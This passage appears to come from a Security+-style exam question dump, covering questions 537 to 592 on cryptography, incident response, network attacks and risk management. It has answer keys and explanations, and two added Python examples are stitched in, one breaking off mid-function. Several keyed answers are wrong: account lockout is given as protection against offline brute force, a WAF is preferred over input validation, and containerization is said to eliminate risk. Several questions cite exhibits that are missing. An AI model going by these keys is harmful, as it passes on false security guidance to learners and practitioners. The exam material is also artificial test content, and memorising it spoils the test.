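The reordered run is the point of the exercise: with a catch-all `deny ip` placed first, every flow to the host matches it before the permits are ever consulted, so nothing is allowed.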
QUESTION 537
A financial institution would like to store its customer data in a cloud but still allow the data to be
accessed and manipulated while encrypted. Doing so would prevent the cloud service provider
from being able to decipher the data due to its sensitivity. The financial institution is not
concerned about computational overheads and slow speeds.
Which of the following cryptographic techniques would BEST meet the requirement?
A. Asymmetric
B. Symmetric
C. Homomorphic
D. Ephemeral
Answer: C
QUESTION 538
An organization's Chief Information Security Officer is creating a position that will be responsible
for implementing technical controls to protect data, including ensuring backups are properly
maintained. Which of the following roles would MOST likely include these responsibilities?
A. Data protection officer
B. Data owner
C. Backup administrator
D. Data custodian
E. Internal auditor
Answer: D
Explanation:
A Data Custodian has administrative and/or operational responsibility over Institutional Data. In
many cases, there will be multiple Data Custodians. An enterprise application may have teams of
Data Custodians, each responsible for varying functions. A Data Custodian is responsible for the
following: Implementing appropriate physical and technical safeguards to protect the
confidentiality, integrity and availability of Institutional Data.
QUESTION 539
A website developer who is concerned about theft of the company's user database wants to
protect weak passwords from offline brute-force attacks.
Which of the following would be the BEST solution?
A. Lock accounts after five failed logons
B. Precompute passwords with rainbow tables
C. Use a key-stretching technique
D. Hash passwords with the MD5 algorithm
Answer: A
QUESTION 540
A user reports trouble using a corporate laptop. The laptop freezes and responds slowly when
writing documents, and the mouse pointer occasionally disappears.
The task list shows the following results:
Which of the following is MOST likely the issue?
A. RAT
B. PUP
C. Spyware
D. Keylogger
Answer: A
QUESTION 541
Which of the following attacks MOST likely occurred on the user's internal network?
Name: Wikipedia.org
Address: 208.80.154.224
A. DNS poisoning
B. URL redirection
C. ARP poisoning
D. /etc/hosts poisoning
Answer: A
QUESTION 542
A company currently uses passwords for logging in to company-owned devices and wants to add
a second authentication factor. Per corporate policy, users are not allowed to have smartphones
at their desks. Which of the following would meet these requirements?
A. Smart card
B. PIN code
C. Knowledge-based question
D. Secret key
Answer: A
QUESTION 543
A dynamic application vulnerability scan identified that code injection could be performed using a web
form. Which of the following will be the BEST remediation to prevent this vulnerability?
A. Implement input validation
B. Deploy MFA
C. Utilize a WAF
D. Configure HIPS
Answer: C
Explanation:
A vulnerability is a flaw or weakness in a computer system's security procedures, internal
controls, design, or implementation that could be exploited to violate the system security policy.
Because a dynamic security vulnerability scan identified code injection via a web form, the best
remediation to prevent this vulnerability is to use a WAF.
A web application firewall (WAF) defends web applications against application-layer attacks
such as cross-site scripting (XSS), SQL injection, and cookie poisoning.
App attacks are the leading cause of breaches because they provide access to your valuable
data.
QUESTION 544
Which of the following would be used to find the MOST common web-application vulnerabilities?
A. OWASP
B. MITRE ATT&CK
C. Cyber Kill Chain
D. SDLC
Answer: A
Explanation:
OWASP is a non-profit organization that provides a comprehensive list of the most common web
application vulnerabilities and offers recommendations for addressing them. MITRE ATT&CK is a
framework for tracking and analyzing the tactics, techniques, and procedures used by attackers,
while Cyber Kill Chain is a methodology for identifying and disrupting an attacker's activities.
SDLC (Software Development Life Cycle) is a systematic approach to developing software.
QUESTION 545
The board of directors at a company contracted with an insurance firm to limit the organization's
liability. Which of the following risk management practices does this BEST describe?
A. Transference
B. Avoidance
C. Mitigation
D. Acknowledgement
Answer: A
Explanation:
If something happens, the insurance company will assume responsibility (Transference).
QUESTION 546
Which of the following would be MOST effective to contain a rapidly spreading attack that is affecting
a large number of organizations?
A. Machine learning
B. DNS sinkhole
C. Blocklist
D. Honeypot
Answer: B
Explanation:
A DNS sinkhole would be the most effective option to contain a rapidly spreading attack that is
affecting a large number of organizations. A DNS sinkhole is a type of security measure that
involves redirecting traffic from malicious domains to a controlled environment, such as a
"sinkhole" server. This can help to prevent the spread of the attack by blocking access to the
malicious domains and preventing users from inadvertently accessing them.
QUESTION 547
An analyst just discovered an ongoing attack on a host that is on the network. The analyst
observes the below taking place:
- The computer performance is slow
- Ads are appearing from various pop-up windows
- Operating system files are modified
- The computer is receiving AV alerts for execution of malicious processes
Which of the following steps should the analyst consider FIRST?
A. Check to make sure the DLP solution is in the active state
B. Patch the host to prevent exploitation
C. Put the machine in containment
D. Update the AV solution on the host to stop the attack
Answer: C
QUESTION 548
Security analysts are conducting an investigation of an attack that occurred inside the
organization's network. An attacker was able to capture network traffic between workstations
throughout the network. The analysts review the following logs:
The layer 2 address table has hundreds of entries similar to the ones above.
Which of the following attacks has MOST likely occurred?
A. SQL injection
B. DNS spoofing
C. MAC flooding
D. ARP poisoning
Answer: C
Explanation:
MAC flooding is a cyber attack that overflows the MAC Table (Layer 2 Table) of switches by
sending out invalid MAC addresses.
When a MAC Address table is full, the switch is no longer able to save new addresses, so it will
enter into fail-open mode and begin broadcasting data (like a hub) to all ports. This will allow an
attacker to get data packets intended for another computer and be able to steal sensitive
information.
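The symptom the explanation describes, a switch table stuffed with invalid addresses, shows up in a table dump as one port that has learned far more MAC addresses than an access port ever legitimately would. The following is an added example, not part of the original question bank (the page's own log excerpt is not reproduced): it parses a constructed Cisco-style `show mac address-table` dump (that layout is an assumption) and flags ports whose learned-address count exceeds a threshold.

```python
import re
from collections import defaultdict

# Constructed switch MAC address table (not from the original page). Ports 1-3
# learn one address each; port 7 is learning a fresh address on every line.
SAMPLE_MAC_TABLE = """\
Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
10      0011.2233.4455    DYNAMIC     Gi1/0/1
10      0011.2233.4456    DYNAMIC     Gi1/0/2
10      0011.2233.4457    DYNAMIC     Gi1/0/3
10      6a3f.1c9e.0001    DYNAMIC     Gi1/0/7
10      6a3f.1c9e.0002    DYNAMIC     Gi1/0/7
10      6a3f.1c9e.0003    DYNAMIC     Gi1/0/7
10      6a3f.1c9e.0004    DYNAMIC     Gi1/0/7
10      6a3f.1c9e.0005    DYNAMIC     Gi1/0/7
10      6a3f.1c9e.0006    DYNAMIC     Gi1/0/7
"""

# Assumed column layout: VLAN, dotted-quad MAC, learning type, port.
ENTRY_RE = re.compile(
    r"^\s*(?P<vlan>\d+)\s+(?P<mac>[0-9a-f]{4}\.[0-9a-f]{4}\.[0-9a-f]{4})\s+"
    r"(?P<type>\S+)\s+(?P<port>\S+)\s*$",
    re.IGNORECASE,
)


def parse_mac_table(text):
    """Return (vlan, mac, port) tuples; header and separator lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((int(m["vlan"]), m["mac"].lower(), m["port"]))
    return entries


def macs_per_port(entries):
    """Count distinct learned addresses on each port."""
    seen = defaultdict(set)
    for _, mac, port in entries:
        seen[port].add(mac)
    return {port: len(macs) for port, macs in seen.items()}


def flooding_suspects(entries, max_macs_per_access_port=3):
    """Ports learning more addresses than an access port plausibly hosts.

    One workstation, or a workstation behind an IP phone, accounts for one or
    two addresses; uplinks and ports facing other switches are expected to
    learn many and should be excluded from the threshold in a real deployment.
    """
    return {
        port: count
        for port, count in macs_per_port(entries).items()
        if count > max_macs_per_access_port
    }


if __name__ == "__main__":
    for port, count in flooding_suspects(parse_mac_table(SAMPLE_MAC_TABLE)).items():
        print(f"{port}: {count} learned addresses")
```

Port security with a per-port MAC limit is the usual switch-side control for this; the dump analysis above is what an analyst does after the fact, or as a periodic check on switches where port security is not yet enabled.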
QUESTION 549
The chief compliance officer from a bank has approved a background check policy for all new
hires. Which of the following is the policy MOST likely protecting against?
A. Preventing any current employees' siblings from working at the bank to prevent nepotism
B. Hiring an employee who has been convicted of theft to adhere to industry compliance
C. Filtering applicants who have added false information to resumes so they appear better qualified
D. Ensuring no new hires have worked at other banks that may be trying to steal customer information
Answer: B
Explanation:
Hiring an employee who has been convicted of theft to adhere to industry compliance - As this is
a compliance officer, they would likely need to be concerned with complying with industry
regulations regarding the employees they hire. For example, PCI DSS requires background
checks for employees handling credit card information.
Background checks generally only allow employers to view criminal and court records, so it could
be helpful for an employer to know if a candidate has a record for theft with a background check
when determining employment.
QUESTION 550
Which biometric error would allow an unauthorized user to access a system?
A. False acceptance
B. False entrance
C. False rejection
D. False denial
Answer: A
Explanation:
False Acceptance - There are only two metrics that are used to determine the performance of
biometrics: FAR (False Acceptance Rate) & FRR (False Rejection Rate). False Acceptance Rate
is a metric for biometric performance that determines the number of instances where
unauthorized persons were incorrectly authorized. For this question, a biometric error would
mean that someone was authorized when they weren't supposed to be authorized.
QUESTION 551
Which of the following would produce the closest experience to responding to an actual incident
response scenario?
A. Lessons learned
B. Simulation
C. Walk-through
D. Tabletop
Answer: B
QUESTION 552
An organization is concerned about intellectual property theft by employees who leave the
organization. Which of the following will the organization MOST likely implement?
A. CBT
B. NDA
C. MOU
D. AUP
Answer: B
QUESTION 553
An organization maintains several environments in which patches are developed and tested
before being deployed to an operational status. Which of the following is the environment in which
patches will be deployed just prior to being put into an operational status?
A. Development
B. Test
C. Production
D. Staging
Answer: D
Explanation:
The staging environment is an optional environment, but it is commonly used when an
organization has multiple production environments. After passing testing, the system moves into
staging, from where it can be deployed to the different production systems.
QUESTION 554
Which of the following control types would be BEST to use to identify violations and incidents?
A. Detective
B. Compensating
C. Deterrent
D. Corrective
E. Recovery
F. Preventive
Answer: A
QUESTION 555
A security manager runs Nessus scans of the network after every maintenance window. Which of
the following is the security manager MOST likely trying to accomplish?
A. Verifying that system patching has effectively removed known vulnerabilities
B. Identifying assets on the network that may not exist on the network asset inventory
C. Validating the hosts do not have vulnerable ports exposed to the internet
D. Checking the status of the automated malware analysis that is being performed
Answer: A
QUESTION 556
A penetration tester gains access to the network by exploiting a vulnerability on a public-facing
web server. Which of the following techniques will the tester most likely perform NEXT?
A. Gather more information about the target through passive reconnaissance
B. Establish rules of engagement before proceeding
C. Create a user account to maintain persistence
D. Move laterally throughout the network to search for sensitive information
Answer: C
Explanation:
Creating a valid account for the pentester can maximize the value of a penetration test when time
is limited.
QUESTION 557
A news article states that a popular web browser deployed on all corporate PCs is vulnerable to a
zero-day attack. Which of the following MOST concerns the Chief Information Security Officer
about the information in the news article?
A. Insider threats have compromised this network
B. Web browsing is not functional for the entire network
C. Antivirus signatures are required to be updated immediately
D. No patches are available for the web browser
Answer: D
QUESTION 558
DDoS attacks are causing an overload on the cluster of cloud servers. A security architect is
researching alternatives to make the cloud environment respond to load fluctuation in a cost-effective way. Which of the following options BEST fulfils the architect's requirements?
A. An orchestration solution that can adjust scalability of cloud assets
B. Use of multipath by adding more connections to cloud storage
C. Cloud assets replicated on geographically distributed regions
D. An on-site backup that is deployed and only used when the load increases
Answer: A
Explanation:
Scaling cloud infrastructures can experience lag during periods of high activity, while additional
assets are added or become active. This is the compromise accepted for a cost-effective
solution that scales. The company could instead run a system that is heavily over-provisioned at all
times in preparation for brief peak moments, but this is expensive and unlikely to be chosen
by most companies. The only case in which you would want that approach is a sensitive or
critical service that MUST remain online; stock exchange servers, military servers, bank servers,
etc. come to mind for this criterion.
QUESTION 559
Administrators have allowed employees to access their company email from personal computers.
However, the administrators are concerned that these computers are another attack surface and
can result in user accounts being breached by foreign actors.
Which of the following actions would provide the MOST secure solution?
A. Enable an option in the administration center so accounts can be locked if they are accessed
from different geographical areas
B. Implement a 16-character minimum length and 30-day expiration password policy
C. Set up a global mail rule to disallow the forwarding of any company email to email addresses
outside the organization
D. Enforce a policy that allows employees to be able to access their email only while they are
connected to the internet via VPN
Answer: A
QUESTION 560
A security engineer needs to build a solution to satisfy regulatory requirements that state certain
critical servers must be accessed using MFA. However, the critical servers are older and are
unable to support the addition of MFA.
Which of the following will the engineer MOST likely use to achieve this objective?
A. A forward proxy
B. A stateful firewall
C. A jump server
D. A port tap
Answer: C
QUESTION 561
A security analyst wants to fingerprint a web server. Which of the following tools will the security
analyst MOST likely use to accomplish this task?
A. nmap -p1-65535 192.168.0.10
B. dig 192.168.0.10
C. curl --head http://192.168.0.10
D. ping 192.168.0.10
Answer: C
Explanation:
curl - Identify a remote web server by requesting only the HTTP headers (-I is the short form of --head):
Type the command as follows:
$ curl -I http://www.remote-server.com/
$ curl -I http://vivekgite.com/
Output:
HTTP/1.1 200 OK
Content-type: text/html
Content-Length: 0
Date: Mon, 28 Jan 2008 08:53:54 GMT
Server: lighttpd
QUESTION 562
Which of the following provides a catalog of security and privacy controls related to the United
States federal information systems?
A. GDPR
B. PCI DSS
C. ISO 27000
D. NIST 800-53
Answer: D
Explanation:
NIST Special Publication 800-53 provides a catalog of security and privacy controls for all U.S.
federal information systems except those related to national security. It is published by the
National Institute of Standards and Technology, which is a non-regulatory agency of the United
States Department of Commerce.
QUESTION 563
An information security policy states that separation of duties is required for all highly sensitive
database changes that involve customers' financial data. Which of the following will this BEST
prevent?
A. Least privilege
B. An insider threat
C. A data breach
D. A change control violation
Answer: B
Explanation:
Separation of duties is a means of establishing checks and balances against the possibility that
critical systems or procedures can be compromised by insider threats. Duties and responsibilities
should be divided among individuals to prevent ethical conflicts or abuse of powers.
QUESTION 564
A security analyst receives an alert from the company's SIEM that anomalous activity is coming
from a local source IP address of 192.168.34.26. The Chief Information Security Officer asks the
analyst to block the originating source. Several days later another employee opens an internal
ticket stating that vulnerability scans are no longer being performed properly. The IP address the
employee provides is 192.168.34.26. Which of the following describes this type of alert?
A. True positive
B. True negative
C. False positive
D. False negative
Answer: C
Explanation:
True Positive: A legitimate attack that triggers an alarm. You have a brute-force
alert, and it fires. You investigate the alert and find out that somebody was indeed trying to
break into one of your systems via brute-force methods.
False Positive: An event that triggers an alarm when no attack has taken place. You
investigate another of these brute-force alerts and find out that it was just some user who
mistyped their password a bunch of times, not a real attack.
False Negative: No alarm is raised even though an attack has taken place. Someone was trying to
break into your system, but they did so below the threshold of your brute-force detection logic. For
example, you set your rule to look for ten failed logins in a minute, and the attacker did only 9. The
attack occurred, but your control was unable to detect it.
True Negative: No attack has taken place and no detection is made. No attack
occurred, and your rule didn't fire.
QUESTION 565
Hackers recently attacked a company's network and obtained several unfavorable pictures from
the Chief Executive Officer's workstation. The hackers are threatening to send the images to the
press if a ransom is not paid. Which of the following is impacted the MOST?
A. Identity theft
B. Data loss
C. Data exfiltration
D. Reputation
Answer: C
Explanation:
Data exfiltration occurs when malware and/or a malicious actor carries out an unauthorized data
transfer from a computer. It is also commonly called data extrusion or data exportation. Data
exfiltration is also considered a form of data theft.
QUESTION 566
A software company is analyzing a process that detects software vulnerabilities at the earliest
stage possible. The goal is to scan the source looking for unsecure practices and weaknesses
before the application is deployed in a runtime environment. Which of the following would BEST
assist the company with this objective?
A. Use fuzzing testing
B. Use a web vulnerability scanner
C. Use static code analysis
D. Use a penetration-testing OS
Answer: C
Explanation:
Fuzzing
Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid,
unexpected, or random data as inputs to a computer program. The program is then monitored for
exceptions such as crashes, failing built-in code assertions, or potential memory leaks.
Static program analysis
Static program analysis is the analysis of computer software performed without executing any
programs, in contrast with dynamic analysis, which is performed on programs during their
execution.
What is static code analysis?
Static code analysis is a method of debugging by examining source code before a program is run.
It's done by analyzing a set of code against a set (or multiple sets) of coding rules. ... This type of
analysis addresses weaknesses in source code that might lead to vulnerabilities.
Penetration test
A penetration test, colloquially known as a pen test or ethical hacking, is an authorized simulated
cyberattack on a computer system, performed to evaluate the security of the system; this is not to
be confused with a vulnerability assessment.
QUESTION 567
A company is providing security awareness training regarding the importance of not forwarding
social media messages from unverified sources. Which of the following risks would this training
help to prevent?
A. Hoaxes
B. SPIMs
C. Identity fraud
D. Credential harvesting
Answer: A
Explanation:
Hoax
A hoax is a falsehood deliberately fabricated to masquerade as the truth. It is distinguishable from
errors in observation or judgment, rumors, urban legends, pseudo sciences, and April Fools' Day
events that are passed along in good faith by believers or as jokes.
Identity theft
Identity theft occurs when someone uses another person's personal identifying information, like
their name, identifying number, or credit card number, without their permission, to commit fraud or
other crimes. The term identity theft was coined in 1964. Identity fraud (also known as identity
theft or crime) involves someone using another individual's personal information without consent,
often to obtain a benefit.
Credential Harvesting
Credential Harvesting (or Account Harvesting) is the use of MITM attacks, DNS poisoning,
phishing, and other vectors to amass large numbers of credentials (username / password
combinations) for reuse.
QUESTION 568
A penetration tester was able to compromise an internal server and is now trying to pivot the
current session in a network lateral movement. Which of the following tools, if available on the
server, will provide the MOST useful information for the next assessment step?
A. Autopsy
B. Cuckoo
C. Memdump
D. Nmap
Answer: D
Explanation:
Memdump
A display or printout of all or selected contents of RAM. After a program abends (crashes), a
memory dump is taken in order to analyze the status of the program. The programmer looks into
the memory buffers to see which data items were being worked on at the time of failure.
Nmap
Nmap is a network scanner created by Gordon Lyon. Nmap is used to discover hosts and
services on a computer network by sending packets and analyzing the responses. Nmap
provides a number of features for probing computer networks, including host discovery and
service and operating system detection.
QUESTION 569
A security analyst is responding to an alert from the SIEM. The alert states that malware was
discovered on a host and was not automatically deleted. Which of the following would be BEST
for the analyst to perform?
A. Add a deny-all rule to that host in the network ACL
B. Implement a network-wide scan for other instances of the malware
C. Quarantine the host from other parts of the network
D. Revoke the client's network access certificates
Answer: B
Explanation:
What is Malware?
Malware, short for "malicious software," refers to any intrusive software developed by
cybercriminals (often called "hackers") to steal data and damage or destroy computers and
computer systems. Examples of common malware include viruses, worms, Trojan viruses,
spyware, adware, and ransomware. Recent malware attacks have exfiltrated data in mass
amounts.
How do I protect my network against malware?
Typically, businesses focus on preventative tools to stop breaches. By securing the perimeter,
businesses assume they are safe. Some advanced malware, however, will eventually make their
way into your network. As a result, it is crucial to deploy technologies that continually monitor and
detect malware that has evaded perimeter defenses. Sufficient advanced malware protection
requires multiple layers of safeguards along with high-level network visibility and intelligence.
How do I detect and respond to malware?
Malware will inevitably penetrate your network. You must have defenses that provide significant
visibility and breach detection. In order to remove malware, you must be able to identify malicious
actors quickly. This requires constant network scanning. Once the threat is identified, you must
remove the malware from your network. Today's antivirus products are not enough to protect
against advanced cyber threats. Learn how to update your antivirus strategy.
QUESTION 570
Which of the following authentication methods sends out a unique password to be used within a
specific number of seconds?
A. TOTP
B. Biometrics
C. Kerberos
D. LDAP
Answer: A
QUESTION 571
Which of the following must be in place before implementing a BCP?
A. SLA
B. AUP
C. NDA
D. BIA
Answer: D
Explanation:
To create an effective business continuity plan, a firm should take these five steps:
Step 1: Risk Assessment
This phase includes:
- Evaluation of the company's risks and exposures
- Assessment of the potential impact of various business disruption scenarios
- Determination of the most likely threat scenarios
- Assessment of telecommunication recovery options and communication plans
- Prioritization of findings and development of a roadmap
Step 2: Business Impact Analysis (BIA)
During this phase we collect information on:
- Recovery assumptions, including Recovery Point Objectives (RPO) and Recovery Time Objectives (RTO)
- Critical business processes and workflows as well as the supporting production applications
- Interdependencies, both internal and external
- Critical staff including backups, skill sets, primary and secondary contacts
- Future endeavors that may impact recovery
- Special circumstances
Pro tip: Compiling your BIA into a master list can be helpful from a holistic standpoint, as well as
helpful in identifying pain points throughout the organization.
Step 3: Business Continuity Plan Development
This phase includes:
- Obtaining executive sign-off of the Business Impact Analysis
- Synthesizing the Risk Assessment and BIA findings to create an actionable and thorough plan
- Developing department, division and site level plans
- Reviewing the plan with key stakeholders to finalize and distribute
Step 4: Strategy and Plan Development
Validate that the recovery times that you have stated in your plan are obtainable and meet the
objectives that are stated in the BIA. They should easily be available and readily accessible to
staff, especially if and when a disaster were to happen. In the development phase, it's important
to incorporate many perspectives from various staff and all departments to help map the overall
company feel and organizational focus. Once the plan is developed, we recommend that you
have an executive or management team review and sign off on the overall plan.
Step 5: Plan Testing & Maintenance
The final critical element of a business continuity plan is to ensure that it is tested and maintained
on a regular basis. This includes:
- Conducting periodic tabletop and simulation exercises to ensure key stakeholders are comfortable with the plan steps
- Executing bi-annual plan reviews
- Performing annual Business Impact Assessments
QUESTION 572
A system that requires an operational availability of 99.99% and has an annual maintenance
window available for patching and fixes will require the HIGHEST:
A. MTBF
B. MTTR
C. RPO
D. RTO
Answer: A
QUESTION 573
A company reduced the area utilized in its datacenter by creating virtual networking through
automation and by creating provisioning routes and rules through scripting.
Which of the following does this example describe?
A. IaC
B. MSSP
C. Containers
D. SaaS
Answer: A
Explanation:
Infrastructure as Code
Infrastructure as code is the process of managing and provisioning computer data centers
through machine-readable definition files, rather than physical hardware configuration or
interactive configuration tools.
QUESTION 574
As part of the lessons-learned phase, the SOC is tasked with building methods to detect if a
previous incident is happening again. Which of the following would allow the security analyst to
alert the SOC if an event is reoccurring?
A. Creating a playbook within the SOAR
B. Implementing rules in the NGFW
C. Updating the DLP hash database
D. Publishing a new CRL with revoked certificates
Answer: A
QUESTION 575
An attacker browses a company's online job board attempting to find any relevant information
regarding the technologies the company uses. Which of the following BEST describes this social
engineering technique?
A. Hoax
B. Reconnaissance
C. Impersonation
D. Pretexting
Answer: B
QUESTION 576
A systems administrator is considering different backup solutions for the IT infrastructure. The
company is looking for a solution that offers the fastest recovery time while also saving the most
amount of storage used to maintain the backups. Which of the following recovery solutions would
be the BEST option to meet these requirements?
A. Snapshot
B. Differential
C. Full
D. Tape
Answer: B
Explanation:
There are mainly three types of backup: full, differential, and incremental.
Let's dive in to know more about the types of backup, the difference between them and which one
would be the best fit for your business.
Full Backup
A full backup is the most complete type of backup, where you clone all the selected data. This
includes files, folders, SaaS applications, hard drives and more. The highlight of a full backup is
the minimal time it requires to restore data. However, since everything is backed up in one go,
it takes longer to back up compared to other types of backup.
The other common issue with running full backups is that they consume a lot of storage space. That's why
most businesses tend to run a full backup and then follow it up with differential or
incremental backups. This reduces the burden on storage space and increases backup speed.
Differential Backup
A differential backup straddles the line between a full and an incremental backup. This type of
backup involves backing up data that was created or changed since the last full backup. To put it
simply, a full backup is done initially, and then subsequent backups are run to include all the
changes made to the files and folders.
It lets you restore data faster than an incremental chain since it requires only two backup components: the
initial full backup and the latest differential backup.
Let's see how a differential backup works:
Day 1: Schedule a full backup.
Day 2: Schedule a differential backup. It will cover all the changes that took place between Day 1
and Day 2.
Day 3: Schedule a differential backup. It will again copy all the data that has changed since the
full backup on Day 1 (so it includes the changes already captured on Day 2 plus those made on Day 3).
Incremental Backup
The first backup in an incremental backup is a full backup. The succeeding backups will only
store changes that were made to the previous backup. Businesses have more flexibility in
spinning these types of backups as often as they want, with only the most recent changes stored.
Incremental backup requires space to store only the changes (increments), which allows for
lightning-fast backups.
Difference Between Full, Differential and Incremental Backups

                              Full                           Differential                                  Incremental
Storage Space                 High                           Medium to High                                Low
Backup Speed                  Slowest                        Fast                                          Fastest
Restoration Speed             Fastest                        Fast                                          Slowest
Media Required for Recovery   Most recent backup only        Most recent full backup & most recent         Most recent full backup & all incremental
                                                             differential backup                           backups since full backup
Duplication                   Stores a lot of duplicate      Stores duplicate files                        No duplicate files
                              files
QUESTION 577
An organization wants seamless authentication to its applications. Which of the following should
the organization employ to meet this requirement?
A. SOAP
B. SAML
C. SSO
D. Kerberos
Answer: C
QUESTION 578
A penetration tester successfully gained access to a company's network. The investigating
analyst determines malicious traffic connected through the WAP despite filtering rules being in
place. Logging in to the connected switch, the analyst sees the following in the ARP table:
Which of the following did the penetration tester MOST likely use?
A. ARP poisoning
B. MAC cloning
C. Man in the middle
D. Evil twin
Answer: B
QUESTION 579
A recent audit cited a risk involving numerous low-criticality vulnerabilities created by a web
application using a third-party library. The development staff state there are still customers using
the application even though it is end of life and it would be a substantial burden to update the
application for compatibility with more secure libraries. Which of the following would be the MOST
prudent course of action?
A. Accept the risk if there is a clear road map for timely decommission
B. Deny the risk due to the end-of-life status of the application
C. Use containerization to segment the application from other applications to eliminate the risk
D. Outsource the application to a third-party developer group
Answer: C
Explanation:
You shouldn't have to take any risk at all if you can containerize the application. The goal of
containerization is to isolate an application so that malware, intruders, system resources or
other applications cannot interact with the application, or with any of its sensitive information, which is secured by the container.
https://www.proofpoint.com/sites/default/files/pp-containerization-and-app-reputation.pdf
QUESTION 580
A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new
ERP system for the company. The CISO categorizes the system, selects the controls that apply
to the system, implements the controls, and then assesses the success of the controls before
authorizing the system. Which of the following is the CISO using to evaluate the environment for
this new ERP system?
A. The Diamond Model of Intrusion Analysis
B. CIS Critical Security Controls
C. NIST Risk Management Framework
D. ISO 27002
Answer: C
Explanation:
The NIST RMF is a simple seven-step process:
1. Essential activities to prepare the organization to manage security and privacy risks
2. Categorize the system and information processed, stored, and transmitted based on an impact
analysis
3. Select the set of NIST SP 800-53 controls to protect the system based on risk assessment(s)
4. Implement the controls and document how controls are deployed
5. Assess to determine if the controls are in place, operating as intended, and producing the
desired results
6. Senior official makes a risk-based decision to authorize the system (to operate)
7. Continuously monitor control implementation and risks to the system.
The actions of the CISO correspond to that process.
QUESTION 581
During an investigation, the incident response team discovers that multiple administrator
accounts were suspected of being compromised. The host audit logs indicate a repeated brute-force attack on a single administrator account followed by suspicious logins from unfamiliar
geographic locations. Which of the following data sources would be BEST to use to assess the
accounts impacted by this attack?
A. User behavior analytics
B. Dump files
C. Bandwidth monitors
D. Protocol analyzer output
Answer: A
Explanation:
User behavior analytics
User behavior analytics (UBA) is a cybersecurity process for detecting insider threats, targeted
attacks, and financial fraud by tracking a system's users. UBA looks at patterns of human
behavior and then analyzes them to detect anomalies that indicate potential threats.
QUESTION 582
During an incident, an EDR system detects an increase in the number of encrypted outbound
connections from multiple hosts. A firewall is also reporting an increase in outbound connections
that use random high ports. An analyst plans to review the correlated logs to find the source of
the incident. Which of the following tools will BEST assist the analyst?
A. A vulnerability scanner
B. A NGFW
C. The Windows Event Viewer
D. A SIEM
Answer: D
QUESTION 583
SIMULATION
An attack has occurred against a company.
INSTRUCTIONS
You have been tasked to do the following:
- Identify the type of attack that is occurring on the network by clicking on the attacker’s tablet and
reviewing the output. (Answer Area 1).
- Identify which compensating controls should be implemented on the assets, in order to reduce
the effectiveness of future attacks by dragging them to the correct server. (Answer area 2)
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Answer:
QUESTION 584
A user's login credentials were recently compromised. During the investigation, the security
analyst determined the user input credentials into a pop-up window when prompted to confirm the
username and password. However, the trusted website does not use a pop-up for entering user
credentials. Which of the following attacks occurred?
A. Cross-site scripting
B. SQL injection
C. DNS poisoning
D. Certificate forgery
Answer: A
QUESTION 585
A routine audit of medical billing claims revealed that several claims were submitted without the
subscriber's knowledge. A review of the audit logs for the medical billing company's system
indicated a company employee downloaded customer records and adjusted the direct deposit
information to a personal bank account. Which of the following does this action describe?
A. Insider threat
B. Social engineering
C. Third-party risk
D. Data breach
Answer: A
Explanation:
Insider threat is the potential for an insider to use their authorized access or understanding of an
organization to harm that organization.
QUESTION 586
During a recent penetration test, the tester discovers large amounts of data were exfiltrated over
the course of 12 months via the Internet. The penetration tester stops the test to inform the client
of the findings. Which of the following should be the client's NEXT step to mitigate the issue?
A. Conduct a full vulnerability scan to identify possible vulnerabilities
B. Perform containment on the critical servers and resources
C. Review the firewall and identify the source of the active connection
D. Disconnect the entire infrastructure from the Internet
Answer: B
Explanation:
Perform containment on the critical servers and resources: isolation or containment is the first
thing to do after an incident has been discovered.
QUESTION 587
Which of the following should be monitored by threat intelligence researchers who search for
leaked credentials?
A. Common Weakness Enumeration
B. OSINT
C. Dark web
D. Vulnerability databases
Answer: C
Explanation:
https://www.hackers-arise.com/post/open-source-intelligence-osint-finding-breached-emailaddresses-passwords-and-other-credentials
QUESTION 588
Which of the following types of attacks is being attempted and how can it be mitigated?
A. XSS; implement a SIEM
B. CSRF; implement an IPS
C. Directory traversal; implement a WAF
D. SQL injection; implement an IDS
Answer: C
QUESTION 589
Which of the following control types is focused primarily on reducing risk before an incident
occurs?
A. Preventive
B. Deterrent
C. Corrective
D. Detective
Answer: A
Explanation:
A preventive control is designed to be implemented prior to a threat event and reduce and/or
avoid the likelihood and potential impact of a successful threat event.
QUESTION 590
Per company security policy, IT staff members are required to have separate credentials to
perform administrative functions using just-in-time permissions.
Which of the following solutions is the company implementing?
A. Privileged access management
B. SSO
C. RADIUS
D. Attribute-based access control
Answer: A
QUESTION 591
A company is planning to install a guest wireless network so visitors will be able to access the
Internet. The stakeholders want the network to be easy to connect to so time is not wasted during
meetings. The WAPs are configured so that power levels and antennas cover only the
conference rooms where visitors will attend meetings. Which of the following would BEST protect
the company's internal wireless network against visitors accessing company resources?
A. Configure the guest wireless network to be on a separate VLAN from the company's internal
wireless network
B. Change the password for the guest wireless network every month.
C. Decrease the power levels of the access points for the guest wireless network.
D. Enable WPA2 using 802.1X for logging on to the guest wireless network.
Answer: A
QUESTION 592
Which of the following will increase cryptographic security?
A. High data entropy
B. Algorithms that require less computing power
C. Longer key longevity
D. Hashing
Answer: A
Explanation:
Entropy is a measure of disorder. A plaintext will usually exhibit low entropy as it represents a
message in a human language or programming language or data structure. The plaintext must be
ordered for it to be intelligible to a person, computer processor, or database. One of the
requirements of a strong cryptographic algorithm is to produce a disordered ciphertext. Put
another way, the ciphertext must exhibit a high level of entropy. If any elements of order from the
plaintext persist, it will make the ciphertext vulnerable to cryptanalysis, and the algorithm can be
shown to be weak.
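The entropy argument above can be measured. The following Python example is added here and is not part of the original exam material: it computes the Shannon entropy of a constructed plaintext and of two toy "ciphertexts" (a counter-mode keystream that never repeats, and a deliberately weak one that reuses a single 16-byte keystream block), and counts repeated ciphertext blocks, which is exactly the "elements of order from the plaintext persisting" that the explanation warns about. The XOR constructions and the key value are illustrative stand-ins, not real ciphers.

```python
import hashlib
import math
from collections import Counter

# Constructed sample plaintext (not from the page): a 32-byte line repeated so
# block-level structure is visible. KEY is a hypothetical value.
PLAINTEXT = b"Transfer 10000 USD to acct 1337\n" * 64
KEY = b"example-key-not-real"
BLOCK = 16


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: ~0 for constant data, approaching 8.0
    for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def keystream_ciphertext(plaintext: bytes, key: bytes) -> bytes:
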